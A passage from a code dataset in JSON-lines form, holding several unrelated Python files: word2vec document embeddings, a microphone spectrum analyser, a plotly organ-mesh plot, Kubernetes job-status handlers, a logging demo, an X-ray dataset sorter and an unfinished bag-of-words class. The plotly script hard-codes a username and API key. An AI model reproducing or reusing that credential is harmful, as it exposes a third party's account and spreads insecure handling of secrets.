topic')\n\t\ttest_data[k] = build_dataset_with_existing_dictionary(test_words[k], dictionary)\n\t\n\tbatch_size = 128 # Data points in a single batch\n\tembedding_size = 128 # Dimension of the embedding vector.\n\twindow_size = 4 # How many words to consider left and right.\n\t\n\t# We pick a random validation set to sample nearest neighbors\n\tvalid_size = 16 # Random set of words to evaluate similarity 
on.\n\t# We sample valid datapoints randomly from a large window without always being deterministic\n\tvalid_window = 50\n\t\n\t# When selecting valid examples, we select some of the most frequent words as well as\n\t# some moderately rare words\n\t# (32,)\n\tvalid_examples = np.array(random.sample(range(valid_window), valid_size))\n\tvalid_examples = np.append(valid_examples, random.sample(range(1000, 1000 + valid_window), valid_size), axis=0)\n\t\n\t# negative samples\n\tnum_sampled = 32 # Number of negative examples to sample.\n\t\n\ttf.reset_default_graph()\n\t\n\t# Training input data (target word IDs).\n\ttrain_dataset = tf.placeholder(tf.int32, shape=[batch_size, 2 * window_size])\n\t\n\t# Training input label data (context word IDs)\n\ttrain_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])\n\t\n\t# Validation input data, we don't need a placeholder\n\t# as we have already defined the IDs of the words selected\n\t# as validation data used to evaluate the word vectors\n\tvalid_dataset = tf.constant(valid_examples, dtype=tf.int32)\n\t\n\t# Test data. This is used to compute the document embeddings by averaging\n\t# word embeddings of a given document\n\ttest_labels = tf.placeholder(tf.int32, shape=[batch_size], name='test_dataset')\n\t\n\tembeddings = tf.Variable(tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0, dtype=tf.float32))\n\tsoftmax_weights = tf.Variable(tf.truncated_normal([vocabulary_size, embedding_size],\n\t stddev=1.0 / math.sqrt(embedding_size), dtype=tf.float32))\n\tsoftmax_biases = tf.Variable(tf.zeros([vocabulary_size], dtype=tf.float32))\n\t\n\t# Used to compute document embeddings by averaging all the word vectors of a\n\t# given batch of broadcast data,\n\t# i.e. compute document embeddings by averaging a given batch of test data\n\tmean_batch_embedding = tf.reduce_mean(tf.nn.embedding_lookup(embeddings, test_labels), axis=0)\n\t\n\t# Model.\n\t# Look up embeddings for all the context words of the inputs.\n\t# Then compute a tensor by stacking embeddings of all context words\n\tstacked_embedings = None\n\tprint('Defining %d embedding lookups representing each word in the context' % (2 * window_size))\n\tfor i in range(2 * window_size):\n\t\tembedding_i = tf.nn.embedding_lookup(embeddings, train_dataset[:, i])\n\t\tx_size, y_size = embedding_i.get_shape().as_list()\n\t\tif stacked_embedings is None:\n\t\t\tstacked_embedings = tf.reshape(embedding_i, [x_size, y_size, 1])\n\t\telse:\n\t\t\tstacked_embedings = tf.concat(axis=2,\n\t\t\t values=[stacked_embedings, tf.reshape(embedding_i, [x_size, y_size, 1])])\n\t\n\t# Make sure the stacked embeddings have 2*window_size columns\n\tassert stacked_embedings.get_shape().as_list()[2] == 2 * window_size\n\tprint(\"Stacked embedding size: %s\" % stacked_embedings.get_shape().as_list())\n\t\n\t# Compute mean embeddings by taking the mean of the tensor containing the stack of embeddings\n\tmean_embeddings = tf.reduce_mean(stacked_embedings, 2, keepdims=False)\n\tprint(\"Reduced mean embedding size: %s\" % mean_embeddings.get_shape().as_list())\n\t\n\tloss = tf.reduce_mean(\n\t\ttf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=mean_embeddings,\n\t\t labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))\n\t\n\t# Compute the similarity between minibatch examples and all embeddings.\n\t# We use the cosine distance:\n\tnorm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, 
keepdims=True))\n\tnormalized_embeddings = embeddings / norm\n\tvalid_embeddings = tf.nn.embedding_lookup(normalized_embeddings, valid_dataset)\n\tsimilarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))\n\t\n\t# Optimizer. The Adagrad optimizer assigns a learning rate to each individual parameter\n\toptimizer = tf.train.AdagradOptimizer(1.0).minimize(loss)\n\t\n\tnum_steps = 100001\n\tcbow_loss = []\n\t\n\twith tf.Session() as session:\n\t\t\n\t\t# Initialize the variables in the graph\n\t\ttf.global_variables_initializer().run()\n\t\tprint('Initialized')\n\t\t\n\t\taverage_loss = 0\n\t\t\n\t\t# Train the Word2vec model for num_steps iterations\n\t\tfor step in range(num_steps):\n\t\t\t\n\t\t\t# Generate a single batch of data\n\t\t\tbatch_data, batch_labels = generate_batch(data, batch_size, window_size)\n\t\t\t\n\t\t\t# Populate the feed_dict and run the optimizer (minimize loss)\n\t\t\t# and compute the loss\n\t\t\tfeed_dict = {train_dataset: batch_data, train_labels: batch_labels}\n\t\t\t_, l = session.run([optimizer, loss], feed_dict=feed_dict)\n\t\t\t\n\t\t\t# Update the average loss variable\n\t\t\taverage_loss += l\n\t\t\t\n\t\t\tif (step + 1) % 2000 == 0:\n\t\t\t\tif step > 0:\n\t\t\t\t\taverage_loss = average_loss / 2000\n\t\t\t\t# The average loss is an estimate of the loss over the last 2000 batches.\n\t\t\t\tprint('Average loss at step %d: %f' % (step + 1, average_loss))\n\t\t\t\tcbow_loss.append(average_loss)\n\t\t\t\taverage_loss = 0\n\t\t\t\n\t\t\t# Evaluating validation set word similarities\n\t\t\tif (step + 1) % 10000 == 0:\n\t\t\t\tsim = similarity.eval()\n\t\t\t\t# Here we compute the top_k closest words for a given validation word\n\t\t\t\t# in terms of the cosine distance\n\t\t\t\t# We do this for all the words in the validation set\n\t\t\t\t# Note: This is an expensive step\n\t\t\t\tfor i in range(valid_size):\n\t\t\t\t\tvalid_word = reverse_dictionary[valid_examples[i]]\n\t\t\t\t\ttop_k = 8 # number of nearest neighbors\n\t\t\t\t\tnearest = (-sim[i, :]).argsort()[1:top_k + 1]\n\t\t\t\t\tlog = 'Nearest to %s:' % valid_word\n\t\t\t\t\tfor k in range(top_k):\n\t\t\t\t\t\tclose_word = reverse_dictionary[nearest[k]]\n\t\t\t\t\t\tlog = '%s %s,' % (log, close_word)\n\t\t\t\t\tprint(log)\n\t\tfinal_embedings = normalized_embeddings.eval()\n\t\tnp.save('./res/document_embedding', final_embedings)\n\t\twith open('./res/document_losses.csv', 'wt') as f:\n\t\t\twriter = csv.writer(f, delimiter=',')\n\t\t\twriter.writerow(cbow_loss)\n\t\t# Computing broadcast document embeddings by averaging word embeddings\n\t\t\n\t\t# We take batch_size*num_test_steps words from each document\n\t\t# to compute document embeddings\n\t\tnum_test_steps = 100\n\t\t\n\t\t# Store document embeddings\n\t\t# {document_id:embedding} format\n\t\tdocument_embeddings = {}\n\t\tprint('Testing Phase (Compute document embeddings)')\n\t\t\n\t\t# For each broadcast document compute document embeddings\n\t\tfor k, v in test_data.items():\n\t\t\tprint('\\tCalculating mean embedding for document ', k, ' with ', num_test_steps, ' steps.')\n\t\t\tglobal test_data_index\n\t\t\ttest_data_index = 0\n\t\t\ttopic_mean_batch_embeddings = np.empty((num_test_steps, embedding_size), dtype=np.float32)\n\t\t\t\n\t\t\t# keep averaging mean word embeddings obtained for each step\n\t\t\tfor test_step in range(num_test_steps):\n\t\t\t\ttest_batch_labels = generate_test_batch(test_data[k], batch_size)\n\t\t\t\tbatch_mean = session.run(mean_batch_embedding, feed_dict={test_labels: 
test_batch_labels})\n\t\t\t\ttopic_mean_batch_embeddings[test_step, :] = batch_mean\n\t\t\tdocument_embeddings[k] = np.mean(topic_mean_batch_embeddings, axis=0)\n\t\t\n\t\t\n\t\t# Create a t-SNE object\n\t\ttsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)\n\t\t\n\t\tprint('Fitting embeddings to T-SNE')\n\t\t# get the T-SNE manifold\n\t\tdoc_ids, doc_embeddings = zip(*document_embeddings.items())\n\t\ttwo_d_embeddings = tsne.fit_transform(doc_embeddings)\n\t\tprint('\\tDone')\n\t\t\n\t\t# Run the plotting function\n\t\tplot(two_d_embeddings, doc_ids)\n\t\t\n\t\tprint('-------------------------------perform document classification------------------------------')\n\t\tkmeans = KMeans(n_clusters=5, random_state=43643, max_iter=10000, n_init=100, algorithm='elkan')\n\t\tkmeans.fit(np.array(list(document_embeddings.values())))\n\t\t\n\t\t# Compute the items falling within each cluster\n\t\tdocument_classes = {}\n\t\tfor inp, lbl in zip(list(document_embeddings.keys()), kmeans.labels_):\n\t\t\tif lbl not in document_classes:\n\t\t\t\tdocument_classes[lbl] = [inp]\n\t\t\telse:\n\t\t\t\tdocument_classes[lbl].append(inp)\n\t\tfor k, v in document_classes.items():\n\t\t\tprint('\\nDocuments in Cluster ', k)\n\t\t\tprint('\\t', v)\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"Senior_Word2vec/document_emebedding.py","file_name":"document_emebedding.py","file_ext":"py","file_size_in_byte":15838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"624825194","text":"'''\n* the script accumulates data from the microphone and then computes a spectrum\naveraged over the amplitudes\n* the original plan was to extract the dominant frequencies from the spectrum,\nbut in the end only the task of visually inspecting the spectrum remained\n* the signal is downsampled right after acquisition 1) to reduce the amount of\ncomputation 2) because frequencies above one kilohertz do not interest me 3) because a low\nbitrate gives a higher resolution of the Fourier transform\nat low frequencies (out of the box, without any extra tricks)\n* the animation can be switched on/off after first shrinking (by about 10x) the sizes\nof the buffer and the stack\n* the data structure looks like this:\n┌ block ┐\n│ block │ buffer ┐\n│ block │ buffer │ stack\n│ block │ ... ┘\n└ ... 
┘\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport scipy.io.wavfile\nimport scipy.signal\nimport sounddevice as sd\n\ndevicenumber = 1 # microphone number, see sd.query_devices()\n\nbitrate = 44100 # this (and no other) bitrate is what my microphone delivers\ndownsamplerate = 10 # downsampling (by decimation), by a factor of n\nblocksize = 4410 # size of the block taken from the stream (values above\n# 20000 start producing nan)\nbuffersize = 10 # buffer size (in blocks)\nstacksize = 12 # stack size (in buffers); the stack is averaged\n\nprint(blocksize * buffersize * stacksize / bitrate) # s, pure collection time\n# with the computations included, you can multiply it by 2\n\n# data for A-weighting\naw_data = np.array((6.3, -85.4,\n 6.3, -85.4,\n 8, -77.8,\n 10, -70.4,\n 12.5, -63.4,\n 16, -56.7,\n 20, -50.5,\n 25, -44.7,\n 31.5, -39.4,\n 40, -34.6,\n 50, -30.2,\n 63, -26.2,\n 80, -22.5,\n 100, -19.1,\n 125, -16.1,\n 160, -13.4,\n 200, -10.9,\n 250, -8.6,\n 315, -6.6,\n 400, -4.8,\n 500, -3.2,\n 630, -1.9,\n 800, -0.8,\n 1000, 0,\n 1250, 0.6,\n 1600, 1,\n 2000, 1.2,\n 2500, 1.3,\n 3150, 1.2,\n 4000, 1,\n 5000, 0.5,\n 6300, -0.1,\n 8000, -1.1,\n 10000, -2.5,\n 12500, -4.3,\n 16000, -6.6,\n 20000, -9.3))\naw = aw_data[::2], aw_data[1:][::2] # split into the 2 data columns\n\n# Relations between decibels and amplitudes (for sound oscillations)\n# GdB = 20log_10(A2/A1) # the 20 is the square popping out of the logarithm\n# A2 = A1 * 10**(Gdb/20)\n\ndef abydb(A1, Gdb):\n '''\n scale the amplitude according to the gain coefficient\n '''\n A2 = A1 * 10**(Gdb / 20)\n return A2\n\n# scaffolding for the plot\nfig = plt.figure()\nxlim = (1e1, 1e4)\nylim = (1e-9, 1e4)\nax = plt.axes(xlim=xlim, ylim=ylim, xscale='log', yscale='log')\npoints = ax.plot([], [], marker='.')[0]\n\ndef f():\n stack = np.array(())\n\n for j in range(stacksize):\n buffer = np.zeros((buffersize, blocksize//downsamplerate))\n\n for i in range(buffersize):\n def callback(indata, frames, time, status): # acquire and downsample the signal\n dsblock = scipy.signal.decimate(indata.T[0], downsamplerate)\n buffer[i].put(np.arange(dsblock.size), dsblock)\n with sd.InputStream(device=devicenumber, callback=callback, #\n blocksize=blocksize, channels=1):\n sd.sleep(int(blocksize / bitrate * 1000 + 42)) # 42 ms of headroom\n print(j, i, end='\\t') # \"progress bar\"\n\n spec = np.abs(np.fft.fft(buffer.flatten()))**2 # signal power\n freq = np.fft.fftfreq(buffer.flatten().size, 1/(bitrate/downsamplerate)) # frequency grid\n idx = np.argwhere((freq > 13.75) & (freq < 500000)) # cut off the junk\n spec_cut = spec[idx]\n freq_cut = freq[idx]\n spec_cut_aw = abydb(spec_cut, np.interp(freq_cut, aw[0], aw[1])) # A-weighting\n stack = np.append(stack, spec_cut_aw.flatten())\n\n points.set_data(freq_cut, np.mean(stack.reshape(stacksize, -1), 0))\n\n# the kludge below exists so that, by commenting f() in and out,\n# the animation can be enabled for small data-collection times\n\nf() ###\ndef animate(i):\n# f() ###\n pass\nfps = 10\nanim = animation.FuncAnimation(fig, animate, frames=42, interval=1000/fps)\n","sub_path":"soundmax/sdm 1.3 190410-2104.py","file_name":"sdm 1.3 190410-2104.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"427707113","text":"# plotly visualisation\n\"\"\"\nCreated on Thu Mar 21 15:25:28 2019\n\n@author: Eleanor\n\"\"\"\nimport plotly\nplotly.tools.set_credentials_file(username='eleanor1357', 
api_key='oB200N0KGmaub83XuktV')\nplotly.tools.set_config_file(world_readable=True,\n sharing='public')\nimport plotly.plotly as py\nimport plotly.figure_factory as ff\nimport plotly.graph_objs as go\nfrom skimage import measure\nimport numpy as np\nimport time\nimport nibabel as nib\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib import cm\n \n\n\n\ntStart = time.time();\nnp.set_printoptions(precision=4, suppress=True);\n############################## load data ########################\n#mag_pca_result_cube = np.load('C:\\MPhys\\\\Data\\\\PCA results\\\\Panc01StomachCropMagnitudePCAcube.npy');\nmag_pca_result_cube = np.load('C:\\MPhys\\\\Data\\\\Intra Patient\\\\Stomach\\\\PCA\\\\pcaMagStomach04.npy');\n\n\n# Read in the delineation nifti files using nibabel\n#stomach = nib.load('C:\\MPhys\\\\stomach.nii');\nstomach = nib.load('C:\\MPhys\\\\Data\\\\Intra Patient\\\\Stomach\\\\Stomach04\\\\stomachMask.nii')\nstomachHdr = stomach.header;\nstomachData = stomach.get_fdata();\n\n# numpy array conversion\n# stom = np.rot90(np.rot90(np.array(stomachData),2,(0,2)),1,(1,2));\nstom = np.array(stomachData);\n\n##################### functions ###############################\n\ndef tri_indices(faces):\n #simplices is a numpy array defining the simplices of the triangularization\n #returns the lists of indices i, j, k\n\n return ([triplet[c] for triplet in faces] for c in range(3))\n\n# Use marching cubes to obtain the surface mesh of the stomach/stomach PRV delineations\n# input 3d volume - masking data form WM\nverts, faces, normals, values = measure.marching_cubes_lewiner(stom, 50) # note to self:check masking boudaries in lua code - CHECKED eh\nx,y,z = zip(*verts)\n#i,j,k = zip(*faces)\n\n\n################ create trisurf plot #########################\n\n# Use marching cubes to obtain the surface mesh of the stomach/stomach PRV delineations\n# input 3d volume - masking data form WM\nverts, faces, normals, values = measure.marching_cubes_lewiner(stom, 50)\nX3,Y3,Z3 = zip(*verts)\nX3 = np.array(X3)\nY3 = np.array(Y3)\nZ3 = np.array(Z3)\n\n# find the PCA vector values that correspond with mesh vertices and put the values that match the rounded vertex values into an array\n# The program scales the values itself so all it needs is a value per vertex and a colour map to assign it too.\ndef vertexColour(x,y,z):\n coloursMag = np.ndarray(shape = (verts.shape[0]))\n\n for x2 in range(verts.shape[0]):\n coloursMag[x2] = mag_pca_result_cube[np.around(x).astype(int),np.around(y).astype(int),np.around(z).astype(int),0];\n \n return coloursMag\n\ndata = ff.create_trisurf(x=X3, y=Y3, z=Z3, simplices = faces, colormap = 'YlOrRd', \n color_func = vertexColour, show_colorbar = True\n )\n \n\nfig3 = go.Figure(data=data)\nfig3['layout'].update(dict(title= ' Stomach04 - PCA Magnitudes',\n width=1000,\n height=1000,\n scene=dict(\n aspectratio=dict(x=1, y=1, z=0.7),\n camera=dict(eye=dict(x=1.25, y=1.25, z= 1.25)\n )\n )\n ))\n\npy.plot(fig3, filename = 'Stomach04 - PCA Magnitudes.html')\n","sub_path":"Old/Ploty_isosurface_v2.py","file_name":"Ploty_isosurface_v2.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"335414619","text":"from django.conf import settings\nfrom django.db import IntegrityError\n\nfrom db.models.build_jobs import BuildJob\nfrom db.models.experiment_jobs import ExperimentJob\nfrom db.models.experiments import Experiment\nfrom db.models.jobs import Job\nfrom db.models.notebooks import 
NotebookJob\nfrom db.models.projects import Project\nfrom db.models.tensorboards import TensorboardJob\nfrom k8s_events_handlers.tasks.logger import logger\nfrom polyaxon.celery_api import celery_app\nfrom polyaxon.settings import Intervals, K8SEventsCeleryTasks\n\n\ndef set_node_scheduling(job, node_name):\n if job.node_scheduled or node_name is None:\n return\n job.node_scheduled = node_name\n job.save(update_fields=['node_scheduled'])\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_EXPERIMENT_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_experiment_job_statuses(self, payload):\n \"\"\"Experiment jobs statuses\"\"\"\n details = payload['details']\n job_uuid = details['labels']['job_uuid']\n logger.debug('handling events status for job_uuid: %s, status: %s',\n job_uuid, payload['status'])\n\n try:\n job = ExperimentJob.objects.get(uuid=job_uuid)\n except ExperimentJob.DoesNotExist:\n logger.debug('Job uuid`%s` does not exist', job_uuid)\n return\n\n try:\n job.experiment\n except Experiment.DoesNotExist:\n logger.debug('Experiment for job `%s` does not exist anymore', job_uuid)\n return\n\n if job.last_status is None and self.request.retries < 2:\n self.retry(countdown=1)\n\n # Set the new status\n try:\n set_node_scheduling(job, details['node_name'])\n job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n logger.debug('status %s is set for job %s %s', payload['status'], job_uuid, job.id)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n logger.info('Retry job status %s handling %s', payload['status'], job_uuid)\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_job_statuses(self, payload):\n \"\"\"Project jobs statuses\"\"\"\n details = payload['details']\n job_uuid = details['labels']['job_uuid']\n job_name = details['labels']['job_name']\n project_name = details['labels'].get('project_name')\n logger.debug('handling events status for job %s', job_name)\n\n try:\n job = Job.objects.get(uuid=job_uuid)\n except Job.DoesNotExist:\n logger.debug('Job `%s` does not exist', job_name)\n return\n\n try:\n job.project\n except Project.DoesNotExist:\n logger.debug('Project for job `%s` does not exist', project_name)\n return\n\n # Set the new status\n try:\n set_node_scheduling(job, details['node_name'])\n job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_PLUGIN_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_plugin_job_statuses(self, payload):\n \"\"\"Project Plugin jobs statuses\"\"\"\n details = payload['details']\n app = details['labels']['app']\n job_uuid = details['labels']['job_uuid']\n job_name = details['labels']['job_name']\n project_name = details['labels'].get('project_name')\n logger.debug('handling events status for job %s %s', job_name, app)\n\n try:\n if app == settings.APP_LABELS_TENSORBOARD:\n job = TensorboardJob.objects.get(uuid=job_uuid)\n elif app == settings.APP_LABELS_NOTEBOOK:\n job = NotebookJob.objects.get(uuid=job_uuid)\n 
else:\n logger.info('Plugin job `%s` does not exist', app)\n return\n except (NotebookJob.DoesNotExist, TensorboardJob.DoesNotExist):\n logger.debug('`%s - %s` does not exist', app, job_name)\n return\n\n try:\n job.project\n except Project.DoesNotExist:\n logger.debug('`%s` does not exist anymore', project_name)\n\n # Set the new status\n try:\n set_node_scheduling(job, details['node_name'])\n job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_BUILD_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_build_job_statuses(self, payload):\n \"\"\"Build jobs statuses\"\"\"\n details = payload['details']\n app = details['labels']['app']\n job_uuid = details['labels']['job_uuid']\n job_name = details['labels']['job_name']\n project_name = details['labels'].get('project_name')\n logger.debug('handling events status for build job %s %s', job_name, app)\n\n try:\n build_job = BuildJob.objects.get(uuid=job_uuid)\n except BuildJob.DoesNotExist:\n logger.info('Build job `%s` does not exist', job_name)\n return\n\n try:\n build_job.project\n except Project.DoesNotExist:\n logger.debug('`%s` does not exist anymore', project_name)\n\n # Set the new status\n try:\n set_node_scheduling(build_job, details['node_name'])\n build_job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n","sub_path":"polyaxon/k8s_events_handlers/tasks/statuses.py","file_name":"statuses.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"91775983","text":"import logging\n\n# filter\n# logger.addFilter()\n# format\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nf_handler = logging.FileHandler('/var/log/test.log',mode='a')\ns_handler = logging.StreamHandler()\n\nf_handler.setFormatter(formatter)\ns_handler.setFormatter(formatter)\nlevel = logging.DEBUG \nlogger = logging.getLogger(\"main\")\nlogger.setLevel(level)\nlogger.addHandler(f_handler)\nlogger.addHandler(s_handler)\n\nlogger.warning('warning')\n","sub_path":"python/oreilly/logging_t.py","file_name":"logging_t.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"646712140","text":"import os\nimport shutil\nimport csv\n\ndef copiarArquivosPositivos(src, dst, counter, symlinks = False, ignore = None):\n for arquivo in os.listdir(src):\n novoArquivoDividido = arquivo.split('.')\n s = os.path.join(src, arquivo)\n d = os.path.join(dst, 'positivo.' + str(counter) + '.' + novoArquivoDividido[1])\n if os.path.isdir(s):\n print('Directory found')\n else:\n shutil.copy2(s, d)\n counter += 1 \n return counter \n\ndef copiarArquivosNegativos(src, dst, counter, symlinks = False, ignore = None):\n for arquivo in os.listdir(src):\n novoArquivoDividido = arquivo.split('.')\n s = os.path.join(src, arquivo)\n d = os.path.join(dst, 'negativo.' + str(counter) + '.' 
+ novoArquivoDividido[1])\n if os.path.isdir(s):\n print('Directory found')\n else:\n shutil.copy2(s, d)\n counter += 1\n return counter\n\ndef main():\n with open('MURA-v1.1/train_labeled_studies.csv') as arquivo_csv:\n leitor_csv = csv.reader(arquivo_csv, delimiter = ',')\n contador_de_linhas = 0\n\n contador_positivo_xr_elbow = 1\n contador_negativo_xr_elbow = 1\n\n contador_positivo_xr_finger = 1\n contador_negativo_xr_finger = 1\n\n contador_positivo_xr_forearm = 1\n contador_negativo_xr_forearm = 1\n\n contador_positivo_xr_hand = 1\n contador_negativo_xr_hand = 1\n\n contador_positivo_xr_humerus = 1\n contador_negativo_xr_humerus = 1\n\n contador_positivo_xr_shoulder = 1\n contador_negativo_xr_shoulder = 1\n\n contador_positivo_xr_wrist = 1\n contador_negativo_xr_wrist = 1\n\n for linha in leitor_csv:\n contador_de_linhas += 1\n \n linhaDividida = linha[0].split('/')\n \n if(linhaDividida[2] == 'XR_ELBOW'):\n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n contador_positivo_xr_elbow = copiarArquivosPositivos(linha[0], 'datasets/XR_ELBOW/dataset_treino/positivo', contador_positivo_xr_elbow, False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n contador_negativo_xr_elbow = copiarArquivosNegativos(linha[0], 'datasets/XR_ELBOW/dataset_treino/negativo', contador_negativo_xr_elbow, False, None)\n\n if(linhaDividida[2] == 'XR_FINGER'): \n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n copiarArquivosPositivos(linha[0], 'datasets/XR_FINGER/dataset_treino/positivo', contador_positivo_xr_finger, False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n copiarArquivosNegativos(linha[0], 'datasets/XR_FINGER/dataset_treino/negativo', contador_negativo_xr_finger, False, None) \n \n if(linhaDividida[2] == 'XR_FOREARM'):\n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n contador_positivo_xr_forearm = copiarArquivosPositivos(linha[0], 'datasets/XR_FOREARM/dataset_treino/positivo', contador_positivo_xr_forearm , False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n contador_negativo_xr_forearm = copiarArquivosNegativos(linha[0], 'datasets/XR_FOREARM/dataset_treino/negativo', contador_negativo_xr_forearm, False, None)\n\n if(linhaDividida[2] == 'XR_HAND'):\n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n contador_positivo_xr_hand = copiarArquivosPositivos(linha[0], 'datasets/XR_HAND/dataset_treino/positivo', contador_positivo_xr_hand , False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n contador_negativo_xr_hand = copiarArquivosNegativos(linha[0], 'datasets/XR_HAND/dataset_treino/negativo', contador_negativo_xr_hand, False, None)\n\n if(linhaDividida[2] == 'XR_HUMERUS'):\n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n contador_positivo_xr_humerus = copiarArquivosPositivos(linha[0], 'datasets/XR_HUMERUS/dataset_treino/positivo', contador_positivo_xr_humerus, False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n contador_negativo_xr_humerus = copiarArquivosNegativos(linha[0], 'datasets/XR_HUMERUS/dataset_treino/negativo', contador_negativo_xr_humerus, False, None)\n\n if(linhaDividida[2] == 'XR_SHOULDER'):\n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n 
contador_positivo_xr_shoulder = copiarArquivosPositivos(linha[0], 'datasets/XR_SHOULDER/dataset_treino/positivo', contador_positivo_xr_shoulder, False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n contador_negativo_xr_shoulder = copiarArquivosNegativos(linha[0], 'datasets/XR_SHOULDER/dataset_treino/negativo', contador_negativo_xr_shoulder, False, None)\n\n if(linhaDividida[2] == 'XR_WRIST'):\n if(linha[1] == '1'): # Positive case\n print(f'\\t Folder: {linha[0]} - Positive')\n contador_positivo_xr_wrist = copiarArquivosPositivos(linha[0], 'datasets/XR_WRIST/dataset_treino/positivo', contador_positivo_xr_wrist, False, None)\n if(linha[1] == '0'): # Negative case\n print(f'\\t Folder: {linha[0]} - Negative')\n contador_negativo_xr_wrist = copiarArquivosNegativos(linha[0], 'datasets/XR_WRIST/dataset_treino/negativo', contador_negativo_xr_wrist, False, None)\n \n print(f'Total lines processed: {contador_de_linhas}')\n arquivo_csv.close()\n\nif __name__ == '__main__':\n main()","sub_path":"ajuste_dataset_treino.py","file_name":"ajuste_dataset_treino.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"184472406","text":"import os\nfrom collections import Counter\n\nimport numpy as np\nfrom sklearn.base import BaseEstimator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\n\n\nclass NormBagOfWords(BaseEstimator):\n\n def __init__(self, nGram=1, gamma=1):\n self.nGram_ = nGram\n self.gamma_ = gamma\n\n def hlim_w_(self, x):\n return range(len(x)-self.nGram_+1)\n\n def get_ngrams_(self, x, i):\n return ' '.join(x[i:i+self.nGram_])\n\n def toNGrams_(self, X):\n newX = []\n for x in X:\n newX.append(list(map(lambda i: self.get_ngrams_(x, i), self.hlim_w_(x))))\n return newX\n\n def check_bounds(self, x, low, high):\n return self.freqs_[x] >= low and self.freqs_[x] <= high\n\n def check_args(self, low, high):\n if high < low:\n print(' !BagOfWords : low bound must be lower than higher bound')\n raise ValueError\n\n def cutGrams_(self, X, low, high):\n newX = []\n for x in X:\n newX.append(list(filter(lambda gs: self.check_bounds(gs, low, high), x)))\n return newX\n\n def fit(self, X):\n self.freqs_ = Counter()\n for x in X:\n for i in self.hlim_w_(x):\n ngram = self.get_ngrams_(x, i)\n self.freqs_[ngram] += 1\n self.nbGrams_ = len(self.freqs_)\n return self\n\n def getFreq_(self, x):\n if x in self.freqs_:\n return self.freqs_[x]\n else:\n return 0\n\n def getFreqs(self, X):\n check_is_fitted(self, ['freqs_'])\n ret = []\n for x in X:\n ret.append(self.getFreq_(x))\n return ret\n\n def transform(self, X, low=0, high=-1, ret_dict=False):\n # check whether the model has been fitted\n check_is_fitted(self, ['freqs_'])\n\n if high > 0:\n self.check_args(low, high)\n newX = self.cutGrams_(self.toNGrams_(X), low, high)\n else:\n newX = self.toNGrams_(X)\n\n grams = set()\n\n for x in newX:\n grams |= set(x)\n\n grams2id = {g: i for i, g in enumerate(grams)}\n id2grams = {i: g for i, g in 